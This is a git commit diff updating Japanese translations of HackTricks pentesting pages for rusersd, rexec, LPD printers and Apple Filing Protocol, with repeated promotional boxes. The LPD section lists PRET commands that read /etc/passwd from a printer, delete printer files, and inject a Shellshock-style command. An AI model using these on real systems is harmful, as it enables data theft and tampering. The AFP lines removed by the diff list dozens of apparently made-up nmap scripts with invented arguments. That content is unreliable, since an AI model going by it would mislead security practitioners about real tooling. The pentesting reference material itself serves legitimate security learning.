Translated ['network-services-pentesting/1026-pentesting-rusersd.md', 'n

This commit is contained in:
Translator 2024-01-12 08:20:35 +00:00
parent b91a1e861f
commit 8be34067f1
12 changed files with 378 additions and 716 deletions

View file

@ -1,23 +1,21 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**githubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
</details>
# 基本情報
このプロトコルは、ホストのユーザー名を提供します。このようなサービスは、次のようにポートマッパーサービスによってリストアップされる場合があります。
このプロトコルはホストのユーザーネームを提供します。ポートマッパーサービスによってこのようにリストされたサービスを見つけることができるかもしれません:
![](<../.gitbook/assets/image (231).png>)
@ -32,16 +30,14 @@ katykat potatohead:ttyp5 Sep 1 09:35 14
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加する、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
</details>

View file

@ -2,23 +2,21 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**githubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
</details>
## 基本情報
**有効な資格情報**(ユーザー名とパスワード)がわかっている場合、ホスト内で**コマンドを実行**することができるサービスです。
有効な**資格情報**(ユーザー名とパスワード)を知っている場合、ホスト内でコマンドを実行することを**可能にするサービス**です。
**デフォルトポート:** 512
```
@ -29,16 +27,14 @@ PORT STATE SERVICE
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
- あなたは**サイバーセキュリティ会社**で働いていますか? HackTricksであなたの**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックしてください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローしてください。**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**
</details>

View file

@ -1,24 +1,22 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
</details>
Line Printer DaemonLPDプロトコルは、元々80年代のBerkeley Unixで導入されました後にRFC1179で指定)。\
デーモンはポート515/tcpで実行され、`lpr`コマンドを使用してアクセスできます。印刷するために、クライアントはジョブ/ユーザー名を定義する**制御ファイル**と、実際に印刷されるデータを含む**データファイル**を送信します。データファイルの**入力タイプ**は、制御ファイルでさまざまなファイル形式の中から選択することで設定できます。ただし、実際に印刷データを処理する方法は、LPDの実装によって異なります。Unixライクなオペレーティングシステムの人気のあるLPD実装はLPRngです。LPDは、**悪意のあるPostScript**または**PJL印刷ジョブ**を展開するためのキャリアとして使用できます。
Line Printer Daemon (LPD) プロトコルは元々80年代のBerkeley Unixで導入されました後にRFC1179によって規定されました)。\
デーモンは515/tcpポートで実行され、`lpr`コマンドを使用してアクセスできます。印刷するに、クライアントはジョブ/ユーザー名を定義する**コントロールファイル**と、印刷される実際のデータを含む**データファイル**を送信します。データファイルの**入力タイプ**は、**様々なファイル形式**の中からコントロールファイルで設定できます。しかし、印刷データの実際の処理方法はLPDの実装次第です。Unix系オペレーティングシステムのための人気なLPD実装にはLPRngがあります。LPDは、**悪意のあるPostScript**や**PJLプリントジョブ**を展開するためのキャリアとして使用されることがあります。
`lpdprint`と`lpdtest`ツールは[**PRET**](https://github.com/RUB-NDS/PRET)**に含まれています。**これらはLPD対応プリンタにデータを直接印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です:
`lpdprint`と`lpdtest`ツールは[**PRET**](https://github.com/RUB-NDS/PRET)に含まれています。これらはLPD対応プリンタ直接データを印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です:
```
lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
@ -27,25 +25,23 @@ lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
```
[**プリンターハッキングについて詳しくは、このページを読んでください**](pentesting-printers/)。
プリンターのハッキングについてもっと学びたい場合は、[**このページを読んでください**](pentesting-printers/)。
# Shodan
* `ポート515`
* `port 515`
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェックしてください!</strong></summary>
- **サイバーセキュリティ企業で働いていますか?** HackTricksで**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* あなたの**会社をHackTricksに広告掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローしてください。**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**
</details>

View file

@ -1,276 +1,52 @@
# 548 - Apple Filing ProtocolAFPのペントesting
# 548 - Pentesting Apple Filing Protocol (AFP)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください!</strong></summary>
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのスワッグ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricks repo](https://github.com/carlospolop/hacktricks)と[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをご覧ください
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**してください。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください**。
</details>
## 基本情報
**Apple Filing Protocol****AFP**は、かつてのAppleTalk Filing Protocolであり、プロプライエタリなネットワークプロトコルであり、**Apple File Service****AFS**の一部であり、macOSおよびクラシックMac OS向けのファイルサービスを提供します。macOSでは、AFPはいくつかのファイルサービスのうちの1つです。AFPは現在、Unicodeファイル名、POSIXおよびアクセス制御リストの権限、リソースフォーク、名前付き拡張属性、高度なファイルロックをサポートしています。Mac OS 9以前では、AFPはファイルサービスの主要なプロトコルでした。
**Apple Filing Protocol** (**AFP**)、以前の名前はAppleTalk Filing Protocol、は独自のネットワークプロトコルであり、**Apple File Service** (**AFS**)の一部で、macOSとクラシックMac OSのファイルサービスを提供します。macOSでは、AFPはサポートされているいくつかのファイルサービスの一つです。AFPは現在、Unicodeファイル名、POSIXとアクセスコントロールリストの権限、リソースフォーク、名前付き拡張属性、および高度なファイルロックをサポートしています。Mac OS 9およびそれ以前では、AFPはファイルサービスの主要なプロトコルでした。
**デフォルトポート** 548
**デフォルトポート:** 548
```
PORT STATE SERVICE
548/tcp open afp
```
## 列挙
### AFP (Apple Filing Protocol)
AFPは、Appleのファイル共有プロトコルであり、Mac OSシステム間でファイル共有を可能にします。AFPサービスをペンテストする際には、以下の列挙手法を使用できます。
#### 1. AFPのバージョンの特定
AFPサービスのバージョンを特定するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-serverinfo <target>
```
#### 2. AFPの共有フォルダの列挙
AFPサービスが公開している共有フォルダを列挙するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-ls <target>
```
#### 3. AFPのユーザーの列挙
AFPサービスに登録されているユーザーを列挙するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-enum-users <target>
```
#### 4. AFPのグループの列挙
AFPサービスに登録されているグループを列挙するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-enum-groups <target>
```
#### 5. AFPのファイルの列挙
AFPサービスが公開しているファイルを列挙するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-enum-files <target>
```
#### 6. AFPのファイルのダウンロード
AFPサービスからファイルをダウンロードするために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-download <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 7. AFPのファイルのアップロード
AFPサービスにファイルをアップロードするために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-upload <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 8. AFPのファイルの削除
AFPサービスからファイルを削除するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-delete <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 9. AFPのファイルの作成
AFPサービスにファイルを作成するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-create <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 10. AFPのファイルの編集
AFPサービスのファイルを編集するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-edit <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 11. AFPのファイルの検索
AFPサービス内でファイルを検索するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-search <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 12. AFPのファイルの情報の取得
AFPサービスのファイルに関する情報を取得するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-info <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 13. AFPのファイルのパーミッションの変更
AFPサービスのファイルのパーミッションを変更するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-chmod <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>,afp.mode=<mode>'
```
#### 14. AFPのファイルの所有者の変更
AFPサービスのファイルの所有者を変更するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-chown <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>,afp.owner=<owner>'
```
#### 15. AFPのファイルのグループの変更
AFPサービスのファイルのグループを変更するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-chgrp <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>,afp.group=<group>'
```
#### 16. AFPのファイルのリネーム
AFPサービスのファイルをリネームするために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-rename <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>,afp.newname=<newname>'
```
#### 17. AFPのファイルのコピー
AFPサービスのファイルをコピーするために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-copy <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>,afp.destination=<destination>'
```
#### 18. AFPのファイルの移動
AFPサービスのファイルを移動するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-move <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>,afp.destination=<destination>'
```
#### 19. AFPのファイルの圧縮
AFPサービスのファイルを圧縮するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-compress <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 20. AFPのファイルの解凍
AFPサービスのファイルを解凍するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-decompress <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 21. AFPのファイルの圧縮と解凍
AFPサービスのファイルを圧縮および解凍するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-compress-decompress <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 22. AFPのファイルの暗号化
AFPサービスのファイルを暗号化するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-encrypt <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 23. AFPのファイルの復号化
AFPサービスのファイルを復号化するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-decrypt <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 24. AFPのファイルの暗号化と復号化
AFPサービスのファイルを暗号化および復号化するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-encrypt-decrypt <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 25. AFPのファイルの圧縮と暗号化
AFPサービスのファイルを圧縮および暗号化するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-compress-encrypt <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 26. AFPのファイルの解凍と復号化
AFPサービスのファイルを解凍および復号化するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-decompress-decrypt <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
#### 27. AFPのファイルの圧縮、暗号化、解凍、復号化
AFPサービスのファイルを圧縮、暗号化、解凍、および復号化するために、以下のコマンドを使用します。
```bash
nmap -p 548 --script afp-compress-encrypt-decompress-decrypt <target> --script-args 'afp.username=<username>,afp.password=<password>,afp.share=<share>,afp.file=<file>'
```
```bash
msf> use auxiliary/scanner/afp/afp_server_info
nmap -sV --script "afp-* and not dos and not brute" -p <PORT> <IP>
```
| **名前** | **説明** |
| **名前** | **説明** |
| -------------- | ------------------------------------------------------------------------------------------------------------------------------------------ |
| afp-ls | 利用可能なAFPボリュームとファイルを一覧表示します |
| afp-path-vuln | [ここ](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch15.html#ch15fn48)にあるすべてのAFPボリュームとファイルを一覧表示します |
| afp-serverinfo | AFPサーバー情報を表示します |
| afp-showmount | 利用可能なAFP共有とそれに対応するACLを一覧表示します |
| afp-ls | 利用可能なAFPボリュームとファイルをリスト表示します |
| afp-path-vuln | すべてのAFPボリュームとファイルをリスト表示します[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch15.html#ch15fn48) |
| afp-serverinfo | AFPサーバー情報を表示します |
